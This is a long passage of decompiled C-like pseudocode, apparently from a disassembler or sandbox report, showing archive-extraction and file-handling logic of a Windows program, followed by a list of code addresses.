                                                                                                                                                  																										 *(_t640 + 0x2900) =  *(_t640 + 0x29ba);
                                                                                                                                                  																										_v4137 = _t467 & 0xffffff00 |  *(_t640 + 0x2900) == 0x00000000;
                                                                                                                                                  																										if( *(_t640 + 0x29ba) != 0) {
                                                                                                                                                  																											L165:
                                                                                                                                                  																											_v16 = 0;
                                                                                                                                                  																											L166:
                                                                                                                                                  																											_push(_v16);
                                                                                                                                                  																											_push(_t715 + 0x534);
                                                                                                                                                  																											_push(_v12);
                                                                                                                                                  																											_push(_t716);
                                                                                                                                                  																											_push(_t715 + 0x28);
                                                                                                                                                  																											_t471 = E0040E1E4();
                                                                                                                                                  																											__eflags = _t471;
                                                                                                                                                  																											if(_t471 == 0) {
                                                                                                                                                  																												__eflags =  *(_t716 + 0x46b0) & 0x00000001;
                                                                                                                                                  																												if(( *(_t716 + 0x46b0) & 0x00000001) == 0) {
                                                                                                                                                  																													__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                  																													if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                  																														_t501 =  *((intOrPtr*)(_t715 + 0x548));
                                                                                                                                                  																														 *((intOrPtr*)(_t501 + 0x5760)) =  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                  																														 *(_t501 + 0x5764) =  *(_t716 + 0x538c);
                                                                                                                                                  																														 *((char*)(_t501 + 0x5778)) = 0;
                                                                                                                                                  																														__eflags =  *(_t716 + 0x46b0) >> 0x00000004 & 0x00000001;
                                                                                                                                                  																														E00411336( *(_t716 + 0x46c8) & 0x000000ff,  *(_t716 + 0x46b0) >> 0x00000004 & 1);
                                                                                                                                                  																													} else {
                                                                                                                                                  																														E00403974(_t640, _t715 + 0x28,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                  																													}
                                                                                                                                                  																												}
                                                                                                                                                  																											} else {
                                                                                                                                                  																												 *((char*)(_t715 + 0x11dd)) = _v16;
                                                                                                                                                  																											}
                                                                                                                                                  																											__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                  																											if( *((intOrPtr*)(_t716 + 4)) != 0xffffffff) {
                                                                                                                                                  																												E00401264(_t716);
                                                                                                                                                  																											}
                                                                                                                                                  																											__eflags = _v25;
                                                                                                                                                  																											_v5 = 0;
                                                                                                                                                  																											if(_v25 != 0) {
                                                                                                                                                  																												L183:
                                                                                                                                                  																												__eflags = _a11;
                                                                                                                                                  																												if(_a11 != 0) {
                                                                                                                                                  																													goto L195;
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags = _v20 - 0x58;
                                                                                                                                                  																												if(_v20 == 0x58) {
                                                                                                                                                  																													L186:
                                                                                                                                                  																													_push( *(_t716 + 0x46cc));
                                                                                                                                                  																													_t474 = E00403218();
                                                                                                                                                  																													__eflags = _t474;
                                                                                                                                                  																													if(_t474 != 0) {
                                                                                                                                                  																														goto L195;
                                                                                                                                                  																													}
                                                                                                                                                  																													__eflags =  *((intOrPtr*)(_t640 + 0x28c0)) - _t474;
                                                                                                                                                  																													if( *((intOrPtr*)(_t640 + 0x28c0)) != _t474) {
                                                                                                                                                  																														_t369 = _t716 + 0x46cc;
                                                                                                                                                  																														 *_t369 =  *(_t716 + 0x46cc) & 0xffffffdf;
                                                                                                                                                  																														__eflags =  *_t369;
                                                                                                                                                  																													}
                                                                                                                                                  																													__eflags = _v5;
                                                                                                                                                  																													if(_v5 == 0) {
                                                                                                                                                  																														L192:
                                                                                                                                                  																														asm("sbb edx, edx");
                                                                                                                                                  																														asm("sbb eax, eax");
                                                                                                                                                  																														asm("sbb eax, eax");
                                                                                                                                                  																														E0040538C( &_v4156,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e88)) & _t716 + 0x00005310,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334); // executed
                                                                                                                                                  																														E00404EF5( &_v4156);
                                                                                                                                                  																														asm("sbb ecx, ecx");
                                                                                                                                                  																														asm("sbb ecx, ecx");
                                                                                                                                                  																														E00405015(_t716 + 0x52ec,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334);
                                                                                                                                                  																														__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                  																														if(__eflags == 0) {
                                                                                                                                                  																															E004057AA(__eflags,  &_v4133,  &_v3108,  *(_t716 + 0x46cc));
                                                                                                                                                  																														}
                                                                                                                                                  																														 *((char*)(_t715 + 0x11dd)) = 1;
                                                                                                                                                  																														goto L195;
                                                                                                                                                  																													} else {
                                                                                                                                                  																														__eflags =  *(_t640 + 0x2900);
                                                                                                                                                  																														if( *(_t640 + 0x2900) == 0) {
                                                                                                                                                  																															goto L195;
                                                                                                                                                  																														}
                                                                                                                                                  																														E00405005( &_v4156);
                                                                                                                                                  																														goto L192;
                                                                                                                                                  																													}
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags = _v20 - 0x45;
                                                                                                                                                  																												if(_v20 != 0x45) {
                                                                                                                                                  																													goto L195;
                                                                                                                                                  																												}
                                                                                                                                                  																												goto L186;
                                                                                                                                                  																											} else {
                                                                                                                                                  																												_t491 =  *(_t716 + 0x6d88);
                                                                                                                                                  																												__eflags = _t491;
                                                                                                                                                  																												if(_t491 == 0) {
                                                                                                                                                  																													L178:
                                                                                                                                                  																													__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  !( *(_t716 + 0x46c0));
                                                                                                                                                  																													if( *((intOrPtr*)(_t715 + 0x534)) ==  !( *(_t716 + 0x46c0))) {
                                                                                                                                                  																														goto L183;
                                                                                                                                                  																													}
                                                                                                                                                  																													L179:
                                                                                                                                                  																													__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                  																													_push( &_v1052);
                                                                                                                                                  																													if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                  																														_push(0x71);
                                                                                                                                                  																													} else {
                                                                                                                                                  																														_push(0x70);
                                                                                                                                                  																													}
                                                                                                                                                  																													E004098D0();
                                                                                                                                                  																													_push(_t716 + 0x17);
                                                                                                                                                  																													E0040B282();
                                                                                                                                                  																													_v5 = 1;
                                                                                                                                                  																													E00402C51(E0040321D(0x414c7c, 3));
                                                                                                                                                  																													goto L183;
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  *(_t716 + 0x46c0);
                                                                                                                                                  																												if( *((intOrPtr*)(_t715 + 0x534)) ==  *(_t716 + 0x46c0)) {
                                                                                                                                                  																													goto L183;
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags = _t491;
                                                                                                                                                  																												if(_t491 != 0) {
                                                                                                                                                  																													goto L179;
                                                                                                                                                  																												}
                                                                                                                                                  																												goto L178;
                                                                                                                                                  																											}
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags = _v25;
                                                                                                                                                  																										_v16 = 1;
                                                                                                                                                  																										if(_v25 == 0) {
                                                                                                                                                  																											goto L166;
                                                                                                                                                  																										}
                                                                                                                                                  																										goto L165;
                                                                                                                                                  																									} else {
                                                                                                                                                  																										__eflags =  *((intOrPtr*)(_t716 + 0x6d98)) - _t467;
                                                                                                                                                  																										if( *((intOrPtr*)(_t716 + 0x6d98)) != _t467) {
                                                                                                                                                  																											goto L163;
                                                                                                                                                  																										}
                                                                                                                                                  																										_t511 =  *(_t716 + 0x5380);
                                                                                                                                                  																										_t714 =  *(_t716 + 0x538c);
                                                                                                                                                  																										_t467 = _t511 << 0xb;
                                                                                                                                                  																										__eflags = ( *(_t716 + 0x5384) << 0x00000020 | _t511) << 0xb - _t714;
                                                                                                                                                  																										if(__eflags < 0) {
                                                                                                                                                  																											goto L163;
                                                                                                                                                  																										}
                                                                                                                                                  																										if(__eflags > 0) {
                                                                                                                                                  																											L156:
                                                                                                                                                  																											__eflags = _t714;
                                                                                                                                                  																											if(__eflags < 0) {
                                                                                                                                                  																												L162:
                                                                                                                                                  																												_t467 = E004054E3( &_v4156,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                  																												goto L163;
                                                                                                                                                  																											}
                                                                                                                                                  																											if(__eflags > 0) {
                                                                                                                                                  																												L159:
                                                                                                                                                  																												_t467 = E00405511(_t716, _t714, __eflags);
                                                                                                                                                  																												__eflags = _t714 -  *(_t716 + 0x5384);
                                                                                                                                                  																												if(__eflags < 0) {
                                                                                                                                                  																													goto L163;
                                                                                                                                                  																												}
                                                                                                                                                  																												if(__eflags > 0) {
                                                                                                                                                  																													goto L162;
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags = _t467 -  *(_t716 + 0x5380);
                                                                                                                                                  																												if(_t467 <=  *(_t716 + 0x5380)) {
                                                                                                                                                  																													goto L163;
                                                                                                                                                  																												}
                                                                                                                                                  																												goto L162;
                                                                                                                                                  																											}
                                                                                                                                                  																											__eflags =  *((intOrPtr*)(_t716 + 0x5388)) - 0x5f5e100;
                                                                                                                                                  																											if(__eflags < 0) {
                                                                                                                                                  																												goto L162;
                                                                                                                                                  																											}
                                                                                                                                                  																											goto L159;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags = _t467 -  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                  																										if(_t467 <=  *((intOrPtr*)(_t716 + 0x5388))) {
                                                                                                                                                  																											goto L163;
                                                                                                                                                  																										}
                                                                                                                                                  																										goto L156;
                                                                                                                                                  																									}
                                                                                                                                                  																								}
                                                                                                                                                  																								_push(1);
                                                                                                                                                  																								_push(0);
                                                                                                                                                  																								_push(0);
                                                                                                                                                  																								_v25 = 1;
                                                                                                                                                  																								_a11 = 1;
                                                                                                                                                  																								_a7 = 1;
                                                                                                                                                  																								_t520 = E0040BB2F(_t652,  &_v1052,  &_v6204);
                                                                                                                                                  																								__eflags = _t520;
                                                                                                                                                  																								if(_t520 != 0) {
                                                                                                                                                  																									goto L149;
                                                                                                                                                  																								}
                                                                                                                                                  																								_t641 = 0;
                                                                                                                                                  																								L123:
                                                                                                                                                  																								E0040503B(_t641,  &_v4156);
                                                                                                                                                  																								return _t641;
                                                                                                                                                  																							}
                                                                                                                                                  																							__eflags = _t524;
                                                                                                                                                  																							if(_t524 != 0) {
                                                                                                                                                  																								goto L138;
                                                                                                                                                  																							}
                                                                                                                                                  																							_t527 = E00404CB2(_t706, _t640,  &_v4156, _v12, _v16,  *((intOrPtr*)(_t640 + 0x28a4)),  &_v5,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4))); // executed
                                                                                                                                                  																							__eflags = _t527;
                                                                                                                                                  																							if(_t527 != 0) {
                                                                                                                                                  																								goto L138;
                                                                                                                                                  																							}
                                                                                                                                                  																							_a7 = _t527;
                                                                                                                                                  																							__eflags = _v5 - _t527;
                                                                                                                                                  																							if(_v5 != _t527) {
                                                                                                                                                  																								goto L139;
                                                                                                                                                  																							}
                                                                                                                                                  																							E0040339C(_t716 + 0x17, _v12);
                                                                                                                                                  																							_t652 = 0x414c7c;
                                                                                                                                                  																							E0040321D(0x414c7c, 9);
                                                                                                                                                  																							_t531 = E00407913(_v12);
                                                                                                                                                  																							__eflags = _t531;
                                                                                                                                                  																							if(_t531 != 0) {
                                                                                                                                                  																								goto L139;
                                                                                                                                                  																							}
                                                                                                                                                  																							_push(E004098D0(0x456));
                                                                                                                                                  																							_push(_t716 + 0x17);
                                                                                                                                                  																							E0040B282();
                                                                                                                                                  																							E0040DBC0( &_v7228, _v12, 0x400);
                                                                                                                                                  																							E0040797C(_v12, 1);
                                                                                                                                                  																							E004058C1(_t640, _t716, _v12, 0, 1);
                                                                                                                                                  																							_t541 = E00404CB2(_t706, _t640,  &_v4156, _v12, 0,  *((intOrPtr*)(_t640 + 0x28a4)),  &_v5,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4)));
                                                                                                                                                  																							__eflags = _t541;
                                                                                                                                                  																							if(_t541 == 0) {
                                                                                                                                                  																								_t652 = 0x414c7c;
                                                                                                                                                  																								E0040339C(_t716 + 0x17, _v12);
                                                                                                                                                  																								goto L138;
                                                                                                                                                  																							}
                                                                                                                                                  																							_a7 = 1;
                                                                                                                                                  																							goto L143;
                                                                                                                                                  																						} else {
                                                                                                                                                  																							__eflags = _v20 - 0x58;
                                                                                                                                                  																							if(_v20 != 0x58) {
                                                                                                                                                  																								goto L138;
                                                                                                                                                  																							}
                                                                                                                                                  																							goto L130;
                                                                                                                                                  																						}
                                                                                                                                                  																					}
                                                                                                                                                  																					__eflags = _a7;
                                                                                                                                                  																					if(_a7 == 0) {
                                                                                                                                                  																						L124:
                                                                                                                                                  																						E0040503B(_t640,  &_v4156);
                                                                                                                                                  																						goto L19;
                                                                                                                                                  																					}
                                                                                                                                                  																					__eflags = _v20 - 0x50;
                                                                                                                                                  																					if(_v20 == 0x50) {
                                                                                                                                                  																						goto L124;
                                                                                                                                                  																					}
                                                                                                                                                  																					__eflags = _v20 - 0x45;
                                                                                                                                                  																					if(_v20 == 0x45) {
                                                                                                                                                  																						goto L124;
                                                                                                                                                  																					}
                                                                                                                                                  																					__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 2;
                                                                                                                                                  																					if( *((intOrPtr*)(_t640 + 0x28c8)) == 2) {
                                                                                                                                                  																						goto L124;
                                                                                                                                                  																					}
                                                                                                                                                  																					__eflags = _v25;
                                                                                                                                                  																					if(_v25 != 0) {
                                                                                                                                                  																						goto L124;
                                                                                                                                                  																					}
                                                                                                                                                  																					 *(_t715 + 0x54c) =  *(_t715 + 0x54c) + 1;
                                                                                                                                                  																					__eflags =  *(_t640 + 0x29ba);
                                                                                                                                                  																					if( *(_t640 + 0x29ba) != 0) {
                                                                                                                                                  																						goto L124;
                                                                                                                                                  																					}
                                                                                                                                                  																					__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                  																					__eflags = E0040585A( *((char*)(_t640 + 0x2959)), _v12, _v16, (_t523 & 0xffffff00 |  *((char*)(_t640 + 0x2959)) == 0x00000000) & 0x000000ff,  *(_t716 + 0x46cc));
                                                                                                                                                  																					if(__eflags == 0) {
                                                                                                                                                  																						L118:
                                                                                                                                                  																						 *((char*)(_t715 + 0x11dd)) = 1;
                                                                                                                                                  																						L120:
                                                                                                                                                  																						__eflags =  *((char*)(_t715 + 0x11dd));
                                                                                                                                                  																						if( *((char*)(_t715 + 0x11dd)) != 0) {
                                                                                                                                                  																							asm("sbb eax, eax");
                                                                                                                                                  																							asm("sbb eax, eax");
                                                                                                                                                  																							asm("sbb eax, eax");
                                                                                                                                                  																							__eflags =  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec;
                                                                                                                                                  																							E00405A1F( ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec, _v12, _v16,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e88)) & _t716 + 0x00005310,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334);
                                                                                                                                                  																						}
                                                                                                                                                  																						_t641 = 1;
                                                                                                                                                  																						goto L123;
                                                                                                                                                  																					}
                                                                                                                                                  																					_t558 = E0040572E(__eflags, _v12, _v16);
                                                                                                                                                  																					_a7 = _t558;
                                                                                                                                                  																					__eflags = _t558;
                                                                                                                                                  																					if(__eflags != 0) {
                                                                                                                                                  																						_t570 = E00405765(E0040577D(__eflags, _v12, _v16));
                                                                                                                                                  																						__eflags = _t570;
                                                                                                                                                  																						if(_t570 == 0) {
                                                                                                                                                  																							E00404CB2(_t706, _t640, 0, _v12, _v16,  *((intOrPtr*)(_t640 + 0x28a4)),  &_a7,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4)));
                                                                                                                                                  																							_a7 = 0;
                                                                                                                                                  																						}
                                                                                                                                                  																					}
                                                                                                                                                  																					_t559 = E004058C1(_t640, _t716, _v12, _v16, 1);
                                                                                                                                                  																					__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                  																					_t562 = E0040585A( *((char*)(_t640 + 0x2959)), _v12, _v16, (_t559 & 0xffffff00 |  *((char*)(_t640 + 0x2959)) == 0x00000000) & 0x000000ff,  *(_t716 + 0x46cc));
                                                                                                                                                  																					__eflags = _t562;
                                                                                                                                                  																					if(_t562 != 0) {
                                                                                                                                                  																						__eflags = _a7;
                                                                                                                                                  																						if(_a7 == 0) {
                                                                                                                                                  																							E00402C51(E0040B282(_t716 + 0x17, E004098D0(0x6f), _v12));
                                                                                                                                                  																							E0040321D(0x414c7c, 9);
                                                                                                                                                  																							goto L120;
                                                                                                                                                  																						}
                                                                                                                                                  																						__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                  																						if(__eflags == 0) {
                                                                                                                                                  																							E004057AA(__eflags, _v12, _v16,  *(_t716 + 0x46cc));
                                                                                                                                                  																						}
                                                                                                                                                  																					}
                                                                                                                                                  																					goto L118;
                                                                                                                                                  																				}
                                                                                                                                                  																			}
                                                                                                                                                  																			L94:
                                                                                                                                                  																			_a7 = 0;
                                                                                                                                                  																			goto L95;
                                                                                                                                                  																		}
                                                                                                                                                  																		_t580 = E0040E18B( &_v8392, __eflags, _t716 + 0x52ec);
                                                                                                                                                  																		__eflags = _t580;
                                                                                                                                                  																		if(_t580 == 0) {
                                                                                                                                                  																			goto L95;
                                                                                                                                                  																		}
                                                                                                                                                  																		__eflags = _v8396;
                                                                                                                                                  																		if(_v8396 == 0) {
                                                                                                                                                  																			goto L94;
                                                                                                                                                  																		}
                                                                                                                                                  																		__eflags = E0040E12B( &_v8392, _t706, _t715);
                                                                                                                                                  																		goto L93;
                                                                                                                                                  																	}
                                                                                                                                                  																	__eflags = _v20 - 0x58;
                                                                                                                                                  																	if(_v20 != 0x58) {
                                                                                                                                                  																		goto L95;
                                                                                                                                                  																	}
                                                                                                                                                  																	goto L88;
                                                                                                                                                  																}
                                                                                                                                                  																__eflags =  *((char*)(_t640 + 0x28c5));
                                                                                                                                                  																if( *((char*)(_t640 + 0x28c5)) == 0) {
                                                                                                                                                  																	goto L95;
                                                                                                                                                  																}
                                                                                                                                                  																goto L86;
                                                                                                                                                  															}
                                                                                                                                                  															__eflags =  *(_t716 + 0x46b0) & 0x00000001;
                                                                                                                                                  															_a7 = 1;
                                                                                                                                                  															if(( *(_t716 + 0x46b0) & 0x00000001) == 0) {
                                                                                                                                                  																goto L84;
                                                                                                                                                  															}
                                                                                                                                                  															goto L83;
                                                                                                                                                  														}
                                                                                                                                                  														_t582 = _t640 + 0xc10;
                                                                                                                                                  														__eflags =  *_t582;
                                                                                                                                                  														if( *_t582 == 0) {
                                                                                                                                                  															E0040E218(_t640 + 0x810, _t715 + 0x15de, 0x1000000);
                                                                                                                                                  														} else {
                                                                                                                                                  															E0040E40C(_t715 + 0x15de, _t582);
                                                                                                                                                  														}
                                                                                                                                                  														__eflags = _a7;
                                                                                                                                                  														if(_a7 != 0) {
                                                                                                                                                  															__eflags = 0;
                                                                                                                                                  															 *(_t715 + 0x15de) = 0;
                                                                                                                                                  														}
                                                                                                                                                  														__eflags = _v20 - 0x45;
                                                                                                                                                  														if(_v20 == 0x45) {
                                                                                                                                                  															L75:
                                                                                                                                                  															_t587 = E0040740B( &_v6204);
                                                                                                                                                  															goto L76;
                                                                                                                                                  														} else {
                                                                                                                                                  															__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 2;
                                                                                                                                                  															if( *((intOrPtr*)(_t640 + 0x28c8)) == 2) {
                                                                                                                                                  																goto L75;
                                                                                                                                                  															}
                                                                                                                                                  															_t587 =  &_v6204;
                                                                                                                                                  															L76:
                                                                                                                                                  															E0040E451(_t715 + 0x15de, _t587);
                                                                                                                                                  															__eflags = _a7;
                                                                                                                                                  															if(_a7 != 0) {
                                                                                                                                                  																__eflags =  *((short*)(_t715 + 0x15e0)) - 0x5f;
                                                                                                                                                  																if( *((short*)(_t715 + 0x15e0)) == 0x5f) {
                                                                                                                                                  																	_t591 = E0040728F( *(_t715 + 0x15e2) & 0x0000ffff);
                                                                                                                                                  																	__eflags = _t591;
                                                                                                                                                  																	if(_t591 != 0) {
                                                                                                                                                  																		_t592 = 0x3a;
                                                                                                                                                  																		 *((short*)(_t715 + 0x15e0)) = _t592;
                                                                                                                                                  																	}
                                                                                                                                                  																}
                                                                                                                                                  															}
                                                                                                                                                  															goto L81;
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  													__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 2;
                                                                                                                                                  													if( *((intOrPtr*)(_t640 + 0x28c8)) == 2) {
                                                                                                                                                  														goto L60;
                                                                                                                                                  													} else {
                                                                                                                                                  														_t441 =  &_v1052;
                                                                                                                                                  														goto L61;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  												__eflags = _v20 - 0x58;
                                                                                                                                                  												if(_v20 != 0x58) {
                                                                                                                                                  													goto L59;
                                                                                                                                                  												}
                                                                                                                                                  												_t600 = E004072A7(0x3a);
                                                                                                                                                  												__eflags = _t600;
                                                                                                                                                  												if(_t600 == 0) {
                                                                                                                                                  													goto L59;
                                                                                                                                                  												} else {
                                                                                                                                                  													_a7 = 1;
                                                                                                                                                  													 *_v12 = 0;
                                                                                                                                                  													goto L56;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											_t602 = _t715 + 0x115c;
                                                                                                                                                  											__eflags =  *_t602;
                                                                                                                                                  											if( *_t602 != 0) {
                                                                                                                                                  												goto L52;
                                                                                                                                                  											}
                                                                                                                                                  											_t604 = E00402C52(1,  &_v1052, _t602, 0x80);
                                                                                                                                                  											__eflags = _t604;
                                                                                                                                                  											if(_t604 != 0) {
                                                                                                                                                  												goto L52;
                                                                                                                                                  											} else {
                                                                                                                                                  												_push(0);
                                                                                                                                                  												E0040AE33();
                                                                                                                                                  												E0040AE33(E004098D0(0x73),  &_v1052);
                                                                                                                                                  												 *((char*)(_t715 + 0x1dde)) = 1;
                                                                                                                                                  												goto L202;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										_t431 =  *((intOrPtr*)(_t716 + 0x6d89));
                                                                                                                                                  										_v25 = _t431;
                                                                                                                                                  										__eflags = _t431;
                                                                                                                                                  										if(_t431 == 0) {
                                                                                                                                                  											goto L197;
                                                                                                                                                  										}
                                                                                                                                                  										goto L47;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(_t640 + 0x2e7c) - 1;
                                                                                                                                                  									if( *(_t640 + 0x2e7c) <= 1) {
                                                                                                                                                  										goto L45;
                                                                                                                                                  									}
                                                                                                                                                  									L44:
                                                                                                                                                  									_a15 = 0;
                                                                                                                                                  									goto L45;
                                                                                                                                                  								}
                                                                                                                                                  								_t609 =  *(_t640 + 0x2e7c);
                                                                                                                                                  								__eflags = _t609 - 1;
                                                                                                                                                  								if(_t609 == 1) {
                                                                                                                                                  									goto L45;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _v21;
                                                                                                                                                  								if(_v21 != 0) {
                                                                                                                                                  									goto L45;
                                                                                                                                                  								} else {
                                                                                                                                                  									__eflags = _t609;
                                                                                                                                                  									if(_t609 == 0) {
                                                                                                                                                  										_a15 = _t609;
                                                                                                                                                  									}
                                                                                                                                                  									_t612 = E00407A4E( &_v1052,  &_v6204, 0);
                                                                                                                                                  									__eflags =  *(_t640 + 0x2e7c) - 1 - _t612;
                                                                                                                                                  									if( *(_t640 + 0x2e7c) - 1 != _t612) {
                                                                                                                                                  										goto L44;
                                                                                                                                                  									} else {
                                                                                                                                                  										E00407A4E( &_v1052,  &_v6204, 1);
                                                                                                                                                  										goto L45;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							_t627 = E0040E3F2();
                                                                                                                                                  							_v5 = 1;
                                                                                                                                                  							__eflags = _t627;
                                                                                                                                                  							if(_t627 != 0) {
                                                                                                                                                  								goto L30;
                                                                                                                                                  							}
                                                                                                                                                  							goto L29;
                                                                                                                                                  						}
                                                                                                                                                  						_t628 =  *((intOrPtr*)(_t640 + 0x4acc));
                                                                                                                                                  						__eflags =  *(_t715 + 0x554) -  *((intOrPtr*)(_t628 + 0x30));
                                                                                                                                                  						if( *(_t715 + 0x554) <  *((intOrPtr*)(_t628 + 0x30))) {
                                                                                                                                                  							goto L24;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *((char*)(_t715 + 0x559));
                                                                                                                                                  						if( *((char*)(_t715 + 0x559)) != 0) {
                                                                                                                                                  							goto L202;
                                                                                                                                                  						}
                                                                                                                                                  						goto L24;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t404 - 0x76;
                                                                                                                                                  					if(_t404 == 0x76) {
                                                                                                                                                  						L8:
                                                                                                                                                  						 *((char*)(_t715 + 0x1ddf)) = 1;
                                                                                                                                                  						L9:
                                                                                                                                                  						__eflags = _t404 - 0x7a;
                                                                                                                                                  						if(_t404 != 0x7a) {
                                                                                                                                                  							L14:
                                                                                                                                                  							__eflags = _t404 - 0x7b;
                                                                                                                                                  							if(_t404 != 0x7b) {
                                                                                                                                                  								goto L18;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *(_t716 + 0x5398) & 0x00000001;
                                                                                                                                                  							if(( *(_t716 + 0x5398) & 0x00000001) == 0) {
                                                                                                                                                  								goto L202;
                                                                                                                                                  							}
                                                                                                                                                  							_t630 = E00411361(_t706, _t716, _t715 + 0x28, 0, _v20);
                                                                                                                                                  							__eflags = _t630;
                                                                                                                                                  							if(_t630 == 0) {
                                                                                                                                                  								L3:
                                                                                                                                                  								E0040321D(0x414c7c, 1);
                                                                                                                                                  								goto L202;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *((char*)(_t715 + 0x1ddf)) = 0;
                                                                                                                                                  								E004054B4(_t716,  *((intOrPtr*)(_t716 + 0x6d78)),  *((intOrPtr*)(_t716 + 0x6d7c)), 0);
                                                                                                                                                  								goto L19;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							_t634 = E0040A4C2(_t716 + 0x53e8, "AV");
                                                                                                                                                  							__eflags = _t634;
                                                                                                                                                  							if(_t634 == 0) {
                                                                                                                                                  								 *((char*)(_t715 + 0x1ddf)) = 1;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *((char*)(_t715 + 0x11dd));
                                                                                                                                                  							if( *((char*)(_t715 + 0x11dd)) == 0) {
                                                                                                                                                  								goto L18;
                                                                                                                                                  							} else {
                                                                                                                                                  								asm("sbb ecx, ecx");
                                                                                                                                                  								__eflags =  ~( *(_t715 + 0x15de) & 0x0000ffff) & _t715 + 0x000015de;
                                                                                                                                                  								E004037EF(_t706, _t640, _t716, _t715 + 0x11de,  ~( *(_t715 + 0x15de) & 0x0000ffff) & _t715 + 0x000015de);
                                                                                                                                                  								_t404 = _a4;
                                                                                                                                                  								goto L14;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t404 - 0x79;
                                                                                                                                                  					if(_t404 != 0x79) {
                                                                                                                                                  						goto L9;
                                                                                                                                                  					}
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  				if( *((char*)(__ecx + 0x4ee)) == 0) {
                                                                                                                                                  					goto L202;
                                                                                                                                                  				}
                                                                                                                                                  				if(E00411361(__edx, _t716, __ecx + 0x28, 0, _v20) != 0) {
                                                                                                                                                  					 *((char*)(_t715 + 0x1ddf)) = 0;
                                                                                                                                                  					goto L5;
                                                                                                                                                  				}
                                                                                                                                                  				goto L3;
                                                                                                                                                  			}












































































                                                                                                                                                  0x004039f5
                                                                                                                                                  0x004039fd
                                                                                                                                                  0x00403a07
                                                                                                                                                  0x00403a11
                                                                                                                                                  0x00403a15
                                                                                                                                                  0x00403a17
                                                                                                                                                  0x00403a1a
                                                                                                                                                  0x00403a54
                                                                                                                                                  0x00403a54
                                                                                                                                                  0x00403a5a
                                                                                                                                                  0x00403a5d
                                                                                                                                                  0x00403a60
                                                                                                                                                  0x00403b17
                                                                                                                                                  0x00403b1e
                                                                                                                                                  0x00403b25
                                                                                                                                                  0x00404763
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404763
                                                                                                                                                  0x00403b2b
                                                                                                                                                  0x00403b32
                                                                                                                                                  0x00403b52
                                                                                                                                                  0x00403b5a
                                                                                                                                                  0x00403b6d
                                                                                                                                                  0x00403b74
                                                                                                                                                  0x00403b7b
                                                                                                                                                  0x00403b8d
                                                                                                                                                  0x00403b92
                                                                                                                                                  0x00403b94
                                                                                                                                                  0x00403b98
                                                                                                                                                  0x00403b9c
                                                                                                                                                  0x00403b9e
                                                                                                                                                  0x00403ba2
                                                                                                                                                  0x00403ba4
                                                                                                                                                  0x00403ba4
                                                                                                                                                  0x00403ba2
                                                                                                                                                  0x00403bb0
                                                                                                                                                  0x00403bb7
                                                                                                                                                  0x00403bc6
                                                                                                                                                  0x00403bc6
                                                                                                                                                  0x00403bca
                                                                                                                                                  0x00403bd0
                                                                                                                                                  0x00403bd2
                                                                                                                                                  0x00403bda
                                                                                                                                                  0x00403bde
                                                                                                                                                  0x00403be1
                                                                                                                                                  0x00403bf1
                                                                                                                                                  0x00403c09
                                                                                                                                                  0x00403c0e
                                                                                                                                                  0x00403c10
                                                                                                                                                  0x00403c19
                                                                                                                                                  0x00403c1e
                                                                                                                                                  0x00403c20
                                                                                                                                                  0x00403c30
                                                                                                                                                  0x00403c30
